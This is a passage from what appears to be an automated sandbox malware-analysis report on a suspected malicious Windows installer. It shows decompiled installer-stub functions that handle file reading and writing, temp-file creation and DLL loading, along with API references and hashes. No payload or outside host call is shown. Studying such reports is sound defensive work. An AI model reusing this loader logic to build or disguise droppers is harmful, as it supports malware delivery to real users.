                                                                                        0x00401888
                                                                                        0x0040189f
                                                                                        0x004018a5
                                                                                        0x004018a7
                                                                                        0x00000000
                                                                                        0x004018ad
                                                                                        0x004018ad
                                                                                        0x004018b0
                                                                                        0x004018c8
                                                                                        0x004018b2
                                                                                        0x004018b5
                                                                                        0x004018be
                                                                                        0x004018be
                                                                                        0x004018cd
                                                                                        0x004018d2
                                                                                        0x00402209
                                                                                        0x00000000
                                                                                        0x00402209
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                          • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                          • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp$C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll$Call
                                                                                        • API String ID: 1941528284-4208889
                                                                                        • Opcode ID: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                        • Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
                                                                                        • Opcode Fuzzy Hash: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                        • Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                                                                        0x00402f1d
                                                                                        0x00402f27
                                                                                        0x00402f30
                                                                                        0x00402f34
                                                                                        0x00402f3f
                                                                                        0x00402f3f
                                                                                        0x00402f47
                                                                                        0x00402f49
                                                                                        0x00402f50
                                                                                        0x00402f6c
                                                                                        0x00402f70
                                                                                        0x00403039
                                                                                        0x00403039
                                                                                        0x00000000
                                                                                        0x00402f7f
                                                                                        0x00402f82
                                                                                        0x00402f88
                                                                                        0x00402f8f
                                                                                        0x00402f92
                                                                                        0x00402f9b
                                                                                        0x00403008
                                                                                        0x0040300e
                                                                                        0x00403010
                                                                                        0x00403010
                                                                                        0x00403022
                                                                                        0x00403026
                                                                                        0x00000000
                                                                                        0x00403028
                                                                                        0x00403028
                                                                                        0x0040302b
                                                                                        0x00403031
                                                                                        0x00000000
                                                                                        0x00403031
                                                                                        0x00402f9d
                                                                                        0x00402fa0
                                                                                        0x00403034
                                                                                        0x00403034
                                                                                        0x00402fa6
                                                                                        0x00402fab
                                                                                        0x00402fab
                                                                                        0x00402fb3
                                                                                        0x00402fb5
                                                                                        0x00402fb5
                                                                                        0x00402fc6
                                                                                        0x00402fca
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402fde
                                                                                        0x00402fe6
                                                                                        0x00403004
                                                                                        0x0040303b
                                                                                        0x0040303b
                                                                                        0x00402fed
                                                                                        0x00402fed
                                                                                        0x00402ff0
                                                                                        0x00402ff3
                                                                                        0x00402ff6
                                                                                        0x00403000
                                                                                        0x00000000
                                                                                        0x00403002
                                                                                        0x00000000
                                                                                        0x00403002
                                                                                        0x00403000
                                                                                        0x00000000
                                                                                        0x00402fe6
                                                                                        0x00000000
                                                                                        0x00402fab
                                                                                        0x00402fa0
                                                                                        0x00402f9b
                                                                                        0x00402f92
                                                                                        0x00402f70
                                                                                        0x0040303c
                                                                                        0x00403040

                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
                                                                                        • ReadFile.KERNELBASE(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
                                                                                        • ReadFile.KERNELBASE(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
                                                                                        • WriteFile.KERNELBASE(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$Read$PointerWrite
                                                                                        • String ID: @0A
                                                                                        • API String ID: 2113905535-1363546919
                                                                                        • Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                        • Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
                                                                                        • Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                        • Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 94%
                                                                                        			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417044; // 0x438f8
				_t37 = _t35 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					_t12 =  *0x417048; // 0x3c078
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
						E00402BD3(0);
					}
					 *0x40afd8 = 0x40b040;
					 *0x40afdc = 0x8000; // executed
					_t16 = E00405F82(0x40afb8); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd8; // 0x40b2b0
					_t40 = _t39 - 0x40b040;
					if(_t40 == 0) {
						__eflags =  *0x40afd4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417044; // 0x438f8
						if(_t18 -  *0x40afb0 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afb0 =  *0x40afb0 + _t40;
						_t53 =  *0x40afd4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}


















                                                                                        0x00403047
                                                                                        0x00403054
                                                                                        0x00403067
                                                                                        0x0040306c
                                                                                        0x004031ad
                                                                                        0x004031af
                                                                                        0x00000000
                                                                                        0x004031b5
                                                                                        0x00403078
                                                                                        0x0040308b
                                                                                        0x00403091
                                                                                        0x00403097
                                                                                        0x004030a2
                                                                                        0x004030a2
                                                                                        0x004030a7
                                                                                        0x004030ac
                                                                                        0x004030b4
                                                                                        0x004030b6
                                                                                        0x004030b6
                                                                                        0x004030bf
                                                                                        0x004030c6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004030cc
                                                                                        0x004030d2
                                                                                        0x004030d8
                                                                                        0x00000000
                                                                                        0x004030de
                                                                                        0x004030e4
                                                                                        0x00403104
                                                                                        0x00403109
                                                                                        0x0040310e
                                                                                        0x00403114
                                                                                        0x0040311a
                                                                                        0x00403124
                                                                                        0x0040312b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040312d
                                                                                        0x00403133
                                                                                        0x00403135
                                                                                        0x00403169
                                                                                        0x0040316f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403171
                                                                                        0x00403173
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403175
                                                                                        0x00403175
                                                                                        0x00403188
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403197
                                                                                        0x00000000
                                                                                        0x00403197
                                                                                        0x00403145
                                                                                        0x0040314d
                                                                                        0x004031a4
                                                                                        0x004031aa
                                                                                        0x004031aa
                                                                                        0x00000000
                                                                                        0x00403155
                                                                                        0x00403155
                                                                                        0x0040315b
                                                                                        0x00403161
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403167
                                                                                        0x004031a8
                                                                                        0x004031a8
                                                                                        0x00000000
                                                                                        0x004031a8
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00403058
                                                                                          • Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
                                                                                        • WriteFile.KERNELBASE(0040B040,0040B2B0,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
                                                                                        • SetFilePointer.KERNELBASE(000438F8,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$Pointer$CountTickWrite
                                                                                        • String ID: @0A
                                                                                        • API String ID: 2146148272-1363546919
                                                                                        • Opcode ID: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                        • Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
                                                                                        • Opcode Fuzzy Hash: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                        • Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 60%
                                                                                        			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                        0x00401f51
                                                                                        0x00401f51
                                                                                        0x00401f56
                                                                                        0x00401f5d
                                                                                        0x00402019
                                                                                        0x00402164
                                                                                        0x00402164
                                                                                        0x0040288b
                                                                                        0x0040288e
                                                                                        0x0040289a
                                                                                        0x0040289a
                                                                                        0x00401f6c
                                                                                        0x00401f76
                                                                                        0x00401f79
                                                                                        0x00401f88
                                                                                        0x00401f8c
                                                                                        0x00401f92
                                                                                        0x00401f96
                                                                                        0x00402012
                                                                                        0x00000000
                                                                                        0x00402012
                                                                                        0x00401f98
                                                                                        0x00401fa2
                                                                                        0x00401fa6
                                                                                        0x00401fea
                                                                                        0x00401fa8
                                                                                        0x00401fab
                                                                                        0x00401fae
                                                                                        0x00401fde
                                                                                        0x00401fb0
                                                                                        0x00401fb3
                                                                                        0x00401fbc
                                                                                        0x00401fbe
                                                                                        0x00401fbe
                                                                                        0x00401fbc
                                                                                        0x00401fae
                                                                                        0x00401ff2
                                                                                        0x00402007
                                                                                        0x00402007
                                                                                        0x00000000
                                                                                        0x00401ff2
                                                                                        0x00401f7c
                                                                                        0x00401f82
                                                                                        0x00401f86
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                          • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                        • String ID: ?B
                                                                                        • API String ID: 2987980305-117478770
                                                                                        • Opcode ID: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                        • Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
                                                                                        • Opcode Fuzzy Hash: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                        • Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 85%
                                                                                        			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                        0x004015b3
                                                                                        0x004015ba
                                                                                        0x004015bd
                                                                                        0x004015c2
                                                                                        0x004015c6
                                                                                        0x004015c8
                                                                                        0x004015d0
                                                                                        0x004015d6
                                                                                        0x004015d8
                                                                                        0x004015db
                                                                                        0x004015e3
                                                                                        0x004015f0
                                                                                        0x004015fd
                                                                                        0x004015fd
                                                                                        0x004015f2
                                                                                        0x004015f3
                                                                                        0x004015fb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004015fb
                                                                                        0x004015f0
                                                                                        0x00401600
                                                                                        0x00401603
                                                                                        0x00401605
                                                                                        0x00401606
                                                                                        0x004015c8
                                                                                        0x0040160d
                                                                                        0x0040162d
                                                                                        0x00402164
                                                                                        0x0040160f
                                                                                        0x00401611
                                                                                        0x0040161c
                                                                                        0x00401622
                                                                                        0x00401622
                                                                                        0x0040288e
                                                                                        0x0040289a

                                                                                        APIs
                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,74B5F560,0040549F,?,"C:\Users\user\Desktop\SX365783909782021.exe" ,74B5F560), ref: 004056FB
                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F
                                                                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                        • API String ID: 3751793516-501415292
                                                                                        • Opcode ID: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                        • Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
                                                                                        • Opcode Fuzzy Hash: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                        • Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                        0x00405870
                                                                                        0x00405876
                                                                                        0x00405877
                                                                                        0x00405877
                                                                                        0x00405878
                                                                                        0x0040587f
                                                                                        0x00405889
                                                                                        0x00405896
                                                                                        0x00405899
                                                                                        0x004058a1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004058a5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004058a7
                                                                                        0x00000000
                                                                                        0x004058a7
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040587F
                                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CountFileNameTempTick
                                                                                        • String ID: "C:\Users\user\Desktop\SX365783909782021.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                        • API String ID: 1716503409-3785718192
                                                                                        • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
